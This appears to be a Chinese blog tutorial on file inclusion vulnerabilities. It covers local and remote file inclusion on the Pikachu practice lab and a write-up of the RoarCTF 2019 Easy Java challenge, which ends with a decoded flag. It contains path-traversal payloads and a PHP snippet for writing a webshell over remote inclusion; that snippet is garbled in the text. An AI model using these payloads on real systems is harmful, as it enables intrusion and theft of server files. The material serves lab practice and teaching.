文件操作之文件下载读取全解

在Web开发中,开发人员常使用包含函数(如include)来复用代码。但当用户能控制包含的文件路径时,如果没有进行安全校验,攻击者可以构造恶意路径来执行任意文件或代码。

根据利用方式不同,主要分为:

本地文件包含(LFI):包含服务器本地文件

远程文件包含(RFI):包含远程URL文件(需特定配置)

1.文件下载,读取,利用

  1. 进入pikachu靶场选择file include 本地文件包含,这时的url:http://pikachu:8000/vul/fileinclude/fi_local.php

然后随机点击一个,这我选的老大

此时的url:http://pikachu:8000/vul/fileinclude/fi_local.php?filename=file1.php&submit=%E6%8F%90%E4%BA%A4

此时发现fi_local.php?filename=file1.php&submit=提交

知道了在这个文件夹下存在file1.php

验证一下:

其实这个文件的完整路径是:"D:\phpstudy_pro\WWW\pikachu\vul\fileinclude\include\file1.php"

然后在这个网站URL路径是这样的:http://pikachu:8000/vul/fileinclude/fi_local.php?filename=file1.php

fi_local.php中使用了相对路径 ./include/ + filename,而filename来自用户输入的file1.php。

所以如果我们在www文件夹下面创建一个1.txt那能不能读取呢?内容是lllxxy

试试:

此时我的1.txt在"D:\phpstudy_pro\WWW\1.txt"

然后这个http://pikachu:8000/vul/fileinclude/fi_local.php?filename=file1.php

应该输入四个../:http://pikachu:8000/vul/fileinclude/fi_local.php?filename=../../../../1.txt&submit=%E6%8F%90%E4%BA%A4

达到效果成功

2.远程文件包含

这个他会提示你要把更改php.ini文件中allow_url_include,后方off改为on

打开修改后就显示正常:http://pikachu:8000/vul/fileinclude/fi_remote.php

然后还是随便选择一个进行:

http://pikachu:8000/vul/fileinclude/fi_remote.php?filename=include%2Ffile1.php&submit=%E6%8F%90%E4%BA%A4

2.然后利用文件写入的php语言:

<?php

/**

$myfile = fopen("lllxxy.php","w");

txt = '\_GET[x]);?>';

fwrite(myfile,txt);

fclose($myfile);

?>

然后要么进行回环要么远程连接就可以实现

3.RoarCTF2019-文件读取真题复现-比赛( [RoarCTF 2019]Easy Java1**)**

https://buuoj.cn/challenges#[RoarCTF%202019]Easy%20Java

1.尝试弱密码发现不对

2.点击help看看有什么提示出现了这个:

复制代码
java.io.FileNotFoundException:{help.docx}

这个错误提示的意思是:Java程序找不到名为 help.docx 的文件

然后尝试:post方式提交(Java一般文件下载以post方式提交)

提交之后出现:

然后根据javaweb的知识:

WEB-INF/web.xml 是 Java Web 应用程序中非常核心的标准配置文件。

再尝试提交:WEB**-INF/web.xml**

出现

<web-app xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" version="4.0">

<welcome-file-list>

<welcome-file>Index</welcome-file>

</welcome-file-list>

<servlet>

<servlet-name>IndexController</servlet-name>

<servlet-class>com.wm.ctf.IndexController</servlet-class>

</servlet>

<servlet-mapping>

<servlet-name>IndexController</servlet-name>

<url-pattern>/Index</url-pattern>

</servlet-mapping>

<servlet>

<servlet-name>LoginController</servlet-name>

<servlet-class>com.wm.ctf.LoginController</servlet-class>

</servlet>

<servlet-mapping>

<servlet-name>LoginController</servlet-name>

<url-pattern>/Login</url-pattern>

</servlet-mapping>

<servlet>

<servlet-name>DownloadController</servlet-name>

<servlet-class>com.wm.ctf.DownloadController</servlet-class>

</servlet>

<servlet-mapping>

<servlet-name>DownloadController</servlet-name>

<url-pattern>/Download</url-pattern>

</servlet-mapping>

<servlet>

<servlet-name>FlagController</servlet-name>

<servlet-class>com.wm.ctf.FlagController</servlet-class>

</servlet>

<servlet-mapping>

<servlet-name>FlagController</servlet-name>

<url-pattern>/Flag</url-pattern>

</servlet-mapping>

</web-app>

这里就有一些提示:FlagController (这里应该是一个目录com.wm.ctf.FlagController)很可能是获取 flag 的关键入口!

再尝试访问:filename=WEB-INF/web.xml/com.wm.ctf.FlagController发现不行

在尝试:filename=WEB-INF/classes/com/wm/ctf/FlagController.class

发现得到<ZmxhZ3tlMDQ5ZWU5Yi1hYTY5LTRhNWMtYWZkOS1kODE2MmI4YWQxNmJ9Cg==

解码:flag{e049ee9b-aa69-4a5c-afd9-d8162b8ad16b}

总结

1.要发现是文件包含的题目可以从url就可以知道了

2.javaweb的提交方式基本都是post

3.WEB-INF/web.xml 是 Java Web 应用程序中非常核心的标准配置文件。

4.如果真的要访问类文件,应该是: WEB-INF/ ├── web.xml └── classes/ └── com/ └── wm/ └── ctf/ └── FlagController.class

5.最后得到flag

相关推荐
虹科网络安全4 小时前
艾体宝洞察 | 利用“隐形字符”的钓鱼邮件:传统防御为何失效,AI安全意识培训如何补上最后一道防线
运维·网络·安全
冰敷逆向6 小时前
苏宁滑块VMP深入剖析(一):解混淆篇
javascript·爬虫·安全·web
小五传输6 小时前
隔离网闸的作用是什么?新型网闸如何构筑“数字护城河”?
大数据·运维·安全
石像鬼₧魂石7 小时前
内网渗透是网络安全渗透测试
安全·web安全
Neolnfra10 小时前
渗透测试标准化流程
开发语言·安全·web安全·http·网络安全·https·系统安全
奋飞安全11 小时前
给你的Ida插上翅膀
安全·逆向
llxxyy卢11 小时前
逻辑越权之找回机制接口安全
安全
pusheng202511 小时前
普晟传感直播预告 |重塑安全边界:储能与AI数据中心的锂电风险、气体探测技术革新与可量化风险管控
人工智能·安全
云计算练习生11 小时前
渗透测试行业术语扫盲(第十六篇)—— 红蓝对抗与演练类
网络·安全·网络安全·信息安全·渗透测试术语